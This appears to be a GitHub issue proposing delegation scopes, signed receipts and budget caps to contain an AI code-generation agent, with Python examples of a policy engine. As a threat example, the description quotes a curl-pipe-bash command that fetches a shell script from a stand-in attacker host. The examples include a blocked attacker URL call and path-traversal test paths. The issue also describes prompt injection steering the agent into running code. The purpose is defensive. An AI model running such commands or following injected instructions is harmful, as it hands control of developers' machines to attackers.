Generation-scoped governance — filesystem boundaries and signed receipts for code generation #1354

@aeoess

Description

GPT Engineer generates entire codebases from specifications. The agent reads specs, writes code, creates files, and builds projects. During generation, it has unrestricted filesystem access within the project directory and can execute code to test what it builds.

The risk profile: an agent that generates and executes code is one malicious specification (or prompt injection in a dependency) away from executing arbitrary code. The spec says "build a web scraper" — the generated code includes os.system('curl attacker.com/shell.sh | bash') because a poisoned code example was in the training data or a dependency README.

Delegation scoping per generation task:

```python
from agent_passport_system import create_delegation, govern_action

# Generation task gets scoped authority
gen_delegation = create_delegation(
    delegated_to=agent_key,
    delegated_by=developer_key,
    scope=[
        "file:write:/project/src",
        "file:write:/project/tests",
        "file:write:/project/package.json",
        "code:execute:/project"  # can test within project
    ],
    # no file outside /project, no network:external, no shell:arbitrary
    spend_limit=15000,  # $150 LLM budget for generation
    expires_in_seconds=7200,
    max_depth=0
)

# Generated code tries to make an external network call → blocked
result = govern_action(
    action={"type": "network:external", "url": "https://attacker.com/payload"},
    delegation=gen_delegation,
    passport=agent_passport
)
# Blocked: network:external not in scope. Signed receipt.
```

Every file write and code execution produces a signed receipt. After generation completes, the developer has a full audit: which files were created, which code was executed, and the signed proof that nothing outside the project boundary was touched.

The spend limit prevents runaway generation. If the agent enters a generation loop, the budget cap kills it before it burns through API credits.
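To make the scope, receipt and budget mechanics concrete, here is an added self-contained example of the same policy model. It is not code from agent-passport-system or from this issue; `evaluate_action`, `govern`, `make_receipt`, `verify_receipt` and the `DEMO_DELEGATION` record are hypothetical names, the `<kind>:<verb>[:<path-prefix>]` reading of scope strings is an assumption, and the HMAC key and delegation id are constructed demo values. The point it adds beyond the prose is the path handling: a scope like `file:write:/project/src` has to be enforced after normalising `..` segments and without treating `/project/srcx` as a match, and blocked attempts should get a signed receipt just like allowed ones.

```python
import hashlib
import hmac
import json
import os.path
import time

# Constructed demo key. A real receipt signer would hold this in a KMS/HSM and
# use an asymmetric key so that verifiers cannot also forge receipts.
RECEIPT_KEY = b"constructed-demo-receipt-key"

# Mirrors the scope list from the issue. The "<kind>:<verb>[:<path-prefix>]"
# grammar parsed below is a hypothetical interpretation, not the library's own.
DEMO_DELEGATION = {
    "id": "delegation-demo-0001",  # constructed identifier
    "scope": [
        "file:write:/project/src",
        "file:write:/project/tests",
        "file:write:/project/package.json",
        "code:execute:/project",
    ],
    "spend_limit": 15000,  # cents, as in the issue's spend_limit
    "spent": 0,
    "expires_at": time.time() + 7200,
}


def _parse_scope(entry):
    """'file:write:/project/src' -> ('file:write', '/project/src');
    'network:external' -> ('network:external', None)."""
    parts = entry.split(":", 2)
    if len(parts) == 3:
        return parts[0] + ":" + parts[1], parts[2]
    return entry, None


def _path_within(path, root):
    """Containment check after lexical normalisation: '..' segments resolve
    before comparison, and a sibling sharing a prefix ('/project/srcx') does
    not count as inside '/project/src'."""
    path = os.path.normpath(path)
    root = os.path.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def evaluate_action(action, delegation, cost_cents=0, now=None):
    """Decide whether one action falls inside the delegation.
    Returns (allowed, reason); an allowed action is charged to the budget."""
    now = time.time() if now is None else now
    if now >= delegation["expires_at"]:
        return False, "delegation expired"
    if delegation["spent"] + cost_cents > delegation["spend_limit"]:
        return False, "spend limit exceeded"
    atype = action.get("type", "")
    target = action.get("path")
    for entry in delegation["scope"]:
        stype, sroot = _parse_scope(entry)
        if stype != atype:
            continue
        if sroot is None or (target is not None and _path_within(target, sroot)):
            delegation["spent"] += cost_cents
            return True, "matched scope " + entry
    return False, atype + " not in scope"


def _canonical(obj):
    # Deterministic serialisation so the signature covers exactly one byte string.
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def make_receipt(action, delegation, allowed, reason, now=None):
    """Signed record of one governance decision (HMAC-SHA256 over canonical JSON)."""
    body = {
        "delegation": delegation["id"],
        "action": action,
        "allowed": allowed,
        "reason": reason,
        "ts": time.time() if now is None else now,
    }
    sig = hmac.new(RECEIPT_KEY, _canonical(body), hashlib.sha256).hexdigest()
    return {"body": body, "sig": sig}


def verify_receipt(receipt):
    expected = hmac.new(RECEIPT_KEY, _canonical(receipt["body"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, receipt["sig"])


def govern(action, delegation, cost_cents=0, now=None):
    """Evaluate, then emit a receipt either way so blocked attempts are auditable too."""
    allowed, reason = evaluate_action(action, delegation, cost_cents, now)
    return allowed, make_receipt(action, delegation, allowed, reason, now)


if __name__ == "__main__":
    for act in [
        {"type": "file:write", "path": "/project/src/scraper.py"},
        {"type": "file:write", "path": "/project/src/../../etc/cron.d/job"},
        {"type": "file:write", "path": "/project/srcx/evil.py"},
        {"type": "network:external", "url": "https://attacker.com/payload"},
    ]:
        ok, receipt = govern(act, DEMO_DELEGATION, cost_cents=100)
        print(ok, receipt["body"]["reason"], verify_receipt(receipt))
```

The receipts use a shared HMAC key for brevity; with that choice anyone who can verify a receipt can also mint one, so an audit trail meant to be checked by a third party should sign with a private key and publish only the verification key. The budget is charged only on allowed actions, which keeps a runaway loop of blocked attempts from exhausting the limit while still leaving each attempt in the receipt log.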

`pip install agent-passport-system` (v0.8.0, Apache-2.0) or `npm install agent-passport-system` (v1.36.2).
